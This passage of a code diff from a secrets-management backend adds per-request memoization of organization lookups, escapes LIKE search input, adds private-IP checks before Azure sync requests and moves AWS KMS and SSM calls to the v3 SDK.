OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-oidc-auth/identity-oidc-auth-service.ts b/backend/src/services/identity-oidc-auth/identity-oidc-auth-service.ts index a0f866fd1ba..66832a39654 100644 --- a/backend/src/services/identity-oidc-auth/identity-oidc-auth-service.ts +++ b/backend/src/services/identity-oidc-auth/identity-oidc-auth-service.ts @@ -1,6 +1,5 @@ import { ForbiddenError, subject } from "@casl/ability"; import { requestContext } from "@fastify/request-context"; -import axios from "axios"; import https from "https"; import jwt from "jsonwebtoken"; import { JwksClient } from "jwks-rsa"; @@ -21,6 +20,7 @@ import { import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionIdentityActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { getConfig } from "@app/lib/config/env"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError, @@ -31,7 +31,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { getValueByDot } from "@app/lib/template/dot-access"; import { 
blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -91,7 +93,9 @@ export const identityOidcAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -108,13 +112,13 @@ export const identityOidcAuthServiceFactory = ({ caCert = decryptor({ cipherTextBlob: identityOidcAuth.encryptedCaCertificate }).toString(); } - const requestAgent = new https.Agent({ ca: caCert, rejectUnauthorized: !!caCert }); + const requestAgent = caCert ? new https.Agent({ ca: caCert, rejectUnauthorized: true }) : undefined; await blockLocalAndPrivateIpAddresses(identityOidcAuth.oidcDiscoveryUrl); let discoveryDoc: { jwks_uri: string }; try { - const response = await axios.get<{ jwks_uri: string }>( + const response = await request.get<{ jwks_uri: string }>( `${identityOidcAuth.oidcDiscoveryUrl}/.well-known/openid-configuration`, { httpsAgent: identityOidcAuth.oidcDiscoveryUrl.includes("https") ? 
requestAgent : undefined @@ -873,7 +877,10 @@ export const identityOidcAuthServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-project/identity-project-dal.ts b/backend/src/services/identity-project/identity-project-dal.ts index 936f7c8c8e5..39f2256c392 100644 --- a/backend/src/services/identity-project/identity-project-dal.ts +++ b/backend/src/services/identity-project/identity-project-dal.ts @@ -20,6 +20,7 @@ import { } from "@app/db/schemas"; import { TIdentityLdapAuths } from "@app/db/schemas/identity-ldap-auths"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { OrderByDirection } from "@app/lib/types"; import { ProjectIdentityOrderBy, TListProjectIdentityDTO } from "@app/services/identity-project/identity-project-types"; @@ -244,7 +245,7 @@ export const identityProjectDALFactory = (db: TDbClient) => { const fetchIdentitySubquery = (tx || db.replicaNode())(TableName.Identity) .where((qb) => { if (filter.search) { - void qb.whereILike(`${TableName.Identity}.name`, `%${filter.search}%`); + void qb.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(filter.search)}%`); } }) .join(TableName.Membership, `${TableName.Membership}.actorIdentityId`, `${TableName.Identity}.id`) @@ -517,7 +518,7 @@ export const identityProjectDALFactory = (db: TDbClient) => { } if (filter.search) { - void qb.whereILike(`${TableName.Identity}.name`, `%${filter.search}%`); + 
void qb.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(filter.search)}%`); } }) .count(); diff --git a/backend/src/services/identity-spiffe-auth/identity-spiffe-auth-service.ts b/backend/src/services/identity-spiffe-auth/identity-spiffe-auth-service.ts index 264d19bd1b7..5b2cc81adb6 100644 --- a/backend/src/services/identity-spiffe-auth/identity-spiffe-auth-service.ts +++ b/backend/src/services/identity-spiffe-auth/identity-spiffe-auth-service.ts @@ -29,7 +29,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -297,7 +299,9 @@ export const identitySpiffeAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); let subOrganizationId = isSubOrgIdentity ? 
org.id : null; @@ -888,7 +892,10 @@ export const identitySpiffeAuthServiceFactory = ({ actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-tls-cert-auth/identity-tls-cert-auth-service.ts b/backend/src/services/identity-tls-cert-auth/identity-tls-cert-auth-service.ts index 4ad4695408f..03ee186c0fc 100644 --- a/backend/src/services/identity-tls-cert-auth/identity-tls-cert-auth-service.ts +++ b/backend/src/services/identity-tls-cert-auth/identity-tls-cert-auth-service.ts @@ -21,7 +21,9 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -54,7 +56,9 @@ const parseSubjectDetails = (data: string) => { const values: Record = {}; data.split("\n").forEach((el) => { const [key, value] = el.split("="); - values[key.trim()] = value.trim(); + if (key && value) { + values[key.trim()] = value.trim(); + } }); return values; }; @@ -88,7 +92,9 @@ export const identityTlsCertAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + 
orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified diff --git a/backend/src/services/identity-token-auth/identity-token-auth-service.ts b/backend/src/services/identity-token-auth/identity-token-auth-service.ts index 5a5efb8c2d3..49828299c31 100644 --- a/backend/src/services/identity-token-auth/identity-token-auth-service.ts +++ b/backend/src/services/identity-token-auth/identity-token-auth-service.ts @@ -25,6 +25,8 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { ActorType, AuthTokenType } from "../auth/auth-type"; import { TIdentityDALFactory } from "../identity/identity-dal"; @@ -385,7 +387,10 @@ export const identityTokenAuthServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, @@ -479,7 +484,10 @@ export const identityTokenAuthServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = 
validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.CreateToken, @@ -504,7 +512,9 @@ export const identityTokenAuthServiceFactory = ({ const identity = await identityDAL.findById(identityTokenAuth.identityId); if (!identity) throw new UnauthorizedError({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -776,7 +786,10 @@ export const identityTokenAuthServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.CreateToken, diff --git a/backend/src/services/identity-ua/identity-ua-service.ts b/backend/src/services/identity-ua/identity-ua-service.ts index eb27a2b7ecd..db5e9590e99 100644 --- a/backend/src/services/identity-ua/identity-ua-service.ts +++ b/backend/src/services/identity-ua/identity-ua-service.ts @@ -23,7 +23,9 @@ import { } from "@app/lib/errors"; import { checkIPAgainstBlocklist, extractIPDetails, isValidIpOrCidr, TIp } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import 
{ AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -92,7 +94,9 @@ export const identityUaServiceFactory = ({ } const identity = await identityDAL.findById(identityUa.identityId); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a subOrganizationName is specified @@ -104,16 +108,20 @@ export const identityUaServiceFactory = ({ trustedIps: identityUa.clientSecretTrustedIps as TIp[] }); - const LOCKOUT_KEY = `lockout:identity:${identityUa.identityId}:${IdentityAuthMethod.UNIVERSAL_AUTH}:${clientId}`; + const lockoutKey = KeyStorePrefixes.IdentityLockoutState( + identityUa.identityId, + IdentityAuthMethod.UNIVERSAL_AUTH, + clientId + ); - const lockoutRaw = await keyStore.getItem(LOCKOUT_KEY); + const lockoutRaw = await keyStore.getItem(lockoutKey); let lockout: LockoutObject | undefined; if (lockoutRaw) { lockout = JSON.parse(lockoutRaw) as LockoutObject; } - if (lockout && lockout.lockedOut) { + if (lockout && lockout.lockedOut && identityUa.lockoutEnabled) { throw new UnauthorizedError({ message: "This identity auth method is temporarily locked, please try again later", detail: { @@ -146,14 +154,14 @@ export const identityUaServiceFactory = ({ if (identityUa.lockoutEnabled) { let lock: Awaited> | undefined; try { - lock = await keyStore.acquireLock([KeyStorePrefixes.IdentityLockoutLock(LOCKOUT_KEY)], 300, { + lock = await keyStore.acquireLock([KeyStorePrefixes.IdentityLockoutLock(lockoutKey)], 300, { retryCount: 3, retryDelay: 300, retryJitter: 100 }); // Re-fetch the latest lockout data while holding the lock - const 
lockoutRawNew = await keyStore.getItem(LOCKOUT_KEY); + const lockoutRawNew = await keyStore.getItem(lockoutKey); if (lockoutRawNew) { lockout = JSON.parse(lockoutRawNew) as LockoutObject; } else { @@ -181,7 +189,7 @@ export const identityUaServiceFactory = ({ } await keyStore.setItemWithExpiry( - LOCKOUT_KEY, + lockoutKey, lockout.lockedOut ? identityUa.lockoutDurationSeconds : identityUa.lockoutCounterResetSeconds, JSON.stringify(lockout) ); @@ -211,7 +219,7 @@ export const identityUaServiceFactory = ({ }); } else if (lockout) { // If credentials are valid, clear any existing lockout record - await keyStore.deleteItem(LOCKOUT_KEY); + await keyStore.deleteItem(lockoutKey); } const { clientSecretTTL, clientSecretNumUses, clientSecretNumUsesLimit } = validClientSecretInfo; @@ -758,7 +766,10 @@ export const identityUaServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, @@ -848,7 +859,10 @@ export const identityUaServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.CreateToken, @@ -949,7 +963,10 @@ export const identityUaServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { 
shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.GetToken, @@ -1044,7 +1061,10 @@ export const identityUaServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.GetToken, @@ -1135,7 +1155,10 @@ export const identityUaServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.DeleteToken, @@ -1213,7 +1236,7 @@ export const identityUaServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(OrgPermissionIdentityActions.Edit, OrgPermissionSubjects.Identity); } const deleted = await keyStore.deleteItems({ - pattern: `lockout:identity:${identityId}:${IdentityAuthMethod.UNIVERSAL_AUTH}:*` + pattern: KeyStorePrefixes.IdentityLockoutStateByMethodPattern(identityId, IdentityAuthMethod.UNIVERSAL_AUTH) }); return { deleted, identityId, orgId: identityMembershipOrg.scopeOrgId }; diff --git 
a/backend/src/services/identity-v2/identity-dal.ts b/backend/src/services/identity-v2/identity-dal.ts index 7e594227f9c..0a11350e8e2 100644 --- a/backend/src/services/identity-v2/identity-dal.ts +++ b/backend/src/services/identity-v2/identity-dal.ts @@ -1,5 +1,6 @@ import { TDbClient } from "@app/db"; import { AccessScope, AccessScopeData, IdentitiesSchema, TableName } from "@app/db/schemas"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { buildAuthMethods } from "../identity/identity-fns"; @@ -144,7 +145,8 @@ export const identityV2DALFactory = (db: TDbClient) => { } }); - if (filter.search) void baseQuery.whereILike(`${TableName.Identity}.name`, `%${filter.search}%`); + if (filter.search) + void baseQuery.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(filter.search)}%`); const countQuery = baseQuery.clone().count(`${TableName.Identity}.id as count`).first<{ count: string }>(); diff --git a/backend/src/services/identity-v2/identity-fns.ts b/backend/src/services/identity-v2/identity-fns.ts index fde9ef2d3bd..a89762ccab8 100644 --- a/backend/src/services/identity-v2/identity-fns.ts +++ b/backend/src/services/identity-v2/identity-fns.ts @@ -1,10 +1,10 @@ -import { TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; export const getIdentityActiveLockoutAuthMethods = async ( identityId: string, keyStore: Pick ) => { - const activeLockouts = await keyStore.getKeysByPattern(`lockout:identity:${identityId}:*`); + const activeLockouts = await keyStore.getKeysByPattern(KeyStorePrefixes.IdentityLockoutStatePattern(identityId)); const activeLockoutAuthMethods = new Set(); for await (const key of activeLockouts) { diff --git a/backend/src/services/identity/identity-dal.ts b/backend/src/services/identity/identity-dal.ts index 5a07f383b53..fef202b845e 100644 --- 
a/backend/src/services/identity/identity-dal.ts +++ b/backend/src/services/identity/identity-dal.ts @@ -1,6 +1,7 @@ import { TDbClient } from "@app/db"; import { IdentityAuthMethod, TableName, TIdentities } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; export type TIdentityDALFactory = ReturnType; @@ -47,7 +48,7 @@ export const identityDALFactory = (db: TDbClient) => { if (searchTerm) { query = query.where((qb) => { - void qb.whereILike("name", `%${searchTerm}%`); + void qb.whereILike("name", `%${sanitizeSqlLikeString(searchTerm)}%`); }); } diff --git a/backend/src/services/identity/identity-org-dal.ts b/backend/src/services/identity/identity-org-dal.ts index 893fcaa69ad..cc481cf89c4 100644 --- a/backend/src/services/identity/identity-org-dal.ts +++ b/backend/src/services/identity/identity-org-dal.ts @@ -21,6 +21,7 @@ import { } from "@app/db/schemas"; import { TIdentityLdapAuths } from "@app/db/schemas/identity-ldap-auths"; import { BadRequestError, DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { buildKnexFilterForSearchResource } from "@app/lib/search-resource/db"; import { OrderByDirection } from "@app/lib/types"; @@ -178,7 +179,7 @@ export const identityOrgDALFactory = (db: TDbClient) => { .as("paginatedIdentity"); if (search?.length) { - void paginatedIdentity.whereILike(`${TableName.Identity}.name`, `%${search}%`); + void paginatedIdentity.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(search)}%`); } if (limit) { @@ -686,7 +687,7 @@ export const identityOrgDALFactory = (db: TDbClient) => { .count(); if (search?.length) { - void query.whereILike(`${TableName.Identity}.name`, `%${search}%`); + void query.whereILike(`${TableName.Identity}.name`, 
`%${sanitizeSqlLikeString(search)}%`); } const identities = await query; diff --git a/backend/src/services/identity/identity-service.ts b/backend/src/services/identity/identity-service.ts index f3dd02ad18e..fac9d47e86d 100644 --- a/backend/src/services/identity/identity-service.ts +++ b/backend/src/services/identity/identity-service.ts @@ -11,6 +11,8 @@ import { import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; import { BadRequestError, NotFoundError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TIdentityProjectDALFactory } from "@app/services/identity-project/identity-project-dal"; import { getIdentityActiveLockoutAuthMethods } from "@app/services/identity-v2/identity-fns"; @@ -87,7 +89,9 @@ export const identityServiceFactory = ({ const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles([role], orgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const isCustomRole = Boolean(rolePermissionDetails?.role); if (isCustomRole) { const plan = await licenseService.getPlan(orgId); @@ -215,7 +219,9 @@ export const identityServiceFactory = ({ let customRole: TRoles | undefined; if (role) { const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles([role], actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const isCustomRole = Boolean(rolePermissionDetails?.role); if (isCustomRole) { @@ -418,7 +424,7 
@@ export const identityServiceFactory = ({ scope: OrganizationActionScope.Any, actor, actorId, - orgId: actorOrgId, + orgId, actorAuthMethod, actorOrgId }); diff --git a/backend/src/services/integration-auth/integration-auth-service.ts b/backend/src/services/integration-auth/integration-auth-service.ts index d53e2a39a7f..815fc8417fb 100644 --- a/backend/src/services/integration-auth/integration-auth-service.ts +++ b/backend/src/services/integration-auth/integration-auth-service.ts @@ -1,8 +1,8 @@ +import { KMSClient, ListAliasesCommand } from "@aws-sdk/client-kms"; import { ForbiddenError } from "@casl/ability"; import { createAppAuth } from "@octokit/auth-app"; import { Octokit } from "@octokit/rest"; import { Client as OctopusClient, SpaceRepository as OctopusSpaceRepository } from "@octopusdeploy/api-client"; -import KMS from "aws-sdk/clients/kms.js"; import { ActionProjectType, @@ -1059,7 +1059,7 @@ export const integrationAuthServiceFactory = ({ const { shouldUseSecretV2Bridge, botKey } = await projectBotService.getBotKey(integrationAuth.projectId); const { accessId, accessToken } = await getIntegrationAccessToken(integrationAuth, shouldUseSecretV2Bridge, botKey); - const kms = new KMS({ + const kms = new KMSClient({ region, credentials: { accessKeyId: String(accessId), @@ -1067,7 +1067,7 @@ export const integrationAuthServiceFactory = ({ } }); - const aliases = await kms.listAliases({}).promise(); + const aliases = await kms.send(new ListAliasesCommand({})); const keyAliases = aliases.Aliases!.filter((alias) => { if (!alias.TargetKeyId) return false; diff --git a/backend/src/services/integration-auth/integration-list.ts b/backend/src/services/integration-auth/integration-list.ts index e2581d26c8d..3fff120d413 100644 --- a/backend/src/services/integration-auth/integration-list.ts +++ b/backend/src/services/integration-auth/integration-list.ts @@ -99,6 +99,8 @@ export enum IntegrationUrls { AZURE_DEVOPS_API_URL = "https://dev.azure.com", HUMANITEC_API_URL = 
"https://api.humanitec.io", CAMUNDA_API_URL = "https://api.cloud.camunda.io", + DIGICERT_SERVICES_API_URL = "https://www.digicert.com/services/v2", + DIGICERT_SERVICES_API_URL_EU = "https://api-eu.digicert.com/services/v2", GCP_SECRET_MANAGER_SERVICE_NAME = "secretmanager.googleapis.com", GCP_SECRET_MANAGER_URL = `https://${GCP_SECRET_MANAGER_SERVICE_NAME}`, @@ -265,6 +267,7 @@ export const getIntegrationOptions = async () => { { name: "Travis CI", slug: "travisci", + syncSlug: "travis-ci", image: "Travis CI.png", isAvailable: true, type: "pat", diff --git a/backend/src/services/integration-auth/integration-sync-secret.ts b/backend/src/services/integration-auth/integration-sync-secret.ts index b031b6c3c91..d5f1c778cd9 100644 --- a/backend/src/services/integration-auth/integration-sync-secret.ts +++ b/backend/src/services/integration-auth/integration-sync-secret.ts @@ -18,11 +18,19 @@ import { UntagResourceCommand, UpdateSecretCommand } from "@aws-sdk/client-secrets-manager"; +import { + AccessDeniedException, + AddTagsToResourceCommand, + DeleteParameterCommand, + DescribeParametersCommand, + GetParametersByPathCommand, + type Parameter, + PutParameterCommand, + SSMClient +} from "@aws-sdk/client-ssm"; import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts"; import { createAppAuth } from "@octokit/auth-app"; import { Octokit } from "@octokit/rest"; -import type { AWSError } from "aws-sdk"; -import SSM from "aws-sdk/clients/ssm.js"; import { AxiosError } from "axios"; import https from "https"; import sodium from "libsodium-wrappers"; @@ -37,6 +45,7 @@ import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, InternalServerError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { TCreateManySecretsRawFn, TUpdateManySecretsRawFn } from "@app/services/secret/secret-types"; import { 
TIntegrationDALFactory } from "../integration/integration-dal"; @@ -315,6 +324,8 @@ const syncSecretsAzureAppConfig = async ({ message: "Invalid Azure App Configuration URL provided." }); + await blockLocalAndPrivateIpAddresses(integration.app); + const getCompleteAzureAppConfigValues = async (baseURL: string, url: string) => { let result: AzureAppConfigKeyValue[] = []; while (url) { @@ -331,6 +342,9 @@ const syncSecretsAzureAppConfig = async ({ result = result.concat(res.data.items); url = res.data?.["@nextLink"]; + if (url) { + await blockLocalAndPrivateIpAddresses(url); + } } return result; @@ -504,6 +518,12 @@ const syncSecretsAzureKeyVault = async ({ createManySecretsRawFn: (params: TCreateManySecretsRawFn) => Promise>; updateManySecretsRawFn: (params: TUpdateManySecretsRawFn) => Promise>; }) => { + if (!integration.app) { + throw new BadRequestError({ message: "Azure Key Vault URI is required" }); + } + + await blockLocalAndPrivateIpAddresses(integration.app); + interface GetAzureKeyVaultSecret { id: string; // secret URI value: string; @@ -537,6 +557,9 @@ const syncSecretsAzureKeyVault = async ({ result = result.concat(res.data.value); url = res.data.nextLink; + if (url) { + await blockLocalAndPrivateIpAddresses(url); + } } return result; @@ -828,8 +851,7 @@ const syncSecretsAWSParameterStore = async ({ secretAccessKey = accessToken; } - const ssm = new SSM({ - apiVersion: "2014-11-06", + const ssm = new SSMClient({ region: integration.region as string, credentials: { accessKeyId, @@ -839,7 +861,7 @@ const syncSecretsAWSParameterStore = async ({ }); const metadata = IntegrationMetadataSchema.parse(integration.metadata); - const awsParameterStoreSecretsObj: Record = {}; + const awsParameterStoreSecretsObj: Record = {}; logger.info( `getIntegrationSecrets: integration sync triggered for ssm with [projectId=${projectId}] [environment=${integration.environment.slug}] [secretPath=${integration.secretPath}] [shouldDisableDelete=${metadata.shouldDisableDelete}]` ); 
@@ -847,15 +869,15 @@ const syncSecretsAWSParameterStore = async ({ let hasNext = true; let nextToken: string | undefined; while (hasNext) { - const parameters = await ssm - .getParametersByPath({ + const parameters = await ssm.send( + new GetParametersByPathCommand({ Path: integration.path as string, Recursive: false, WithDecryption: true, MaxResults: 10, NextToken: nextToken }) - .promise(); + ); if (parameters.Parameters) { parameters.Parameters.forEach((parameter) => { @@ -879,8 +901,8 @@ const syncSecretsAWSParameterStore = async ({ let describeNextToken: string | undefined; while (hasNextDescribePage) { - const parameters = await ssm - .describeParameters({ + const parameters = await ssm.send( + new DescribeParametersCommand({ MaxResults: 10, NextToken: describeNextToken, ParameterFilters: [ @@ -891,7 +913,7 @@ const syncSecretsAWSParameterStore = async ({ } ] }) - .promise(); + ); if (parameters.Parameters) { parameters.Parameters.forEach((parameter) => { @@ -906,8 +928,7 @@ const syncSecretsAWSParameterStore = async ({ describeNextToken = parameters.NextToken; } } catch (error) { - // eslint-disable-next-line @typescript-eslint/no-explicit-any - if ((error as any).code === "AccessDeniedException") { + if (error instanceof AccessDeniedException) { logger.error( `AWS Parameter Store Error [integration=${integration.id}]: double check AWS account permissions (refer to the Infisical docs)` ); @@ -915,7 +936,7 @@ const syncSecretsAWSParameterStore = async ({ response = { isSynced: false, - syncMessage: (error as AWSError)?.message || "Error syncing with AWS Parameter Store" + syncMessage: (error as Error)?.message || "Error syncing with AWS Parameter Store" }; } } @@ -934,15 +955,15 @@ const syncSecretsAWSParameterStore = async ({ ); try { - await ssm - .putParameter({ + await ssm.send( + new PutParameterCommand({ Name: `${integration.path}${key}`, Type: "SecureString", Value: secrets[key].value, ...(metadata.kmsKeyId && { KeyId: metadata.kmsKeyId }), Overwrite: 
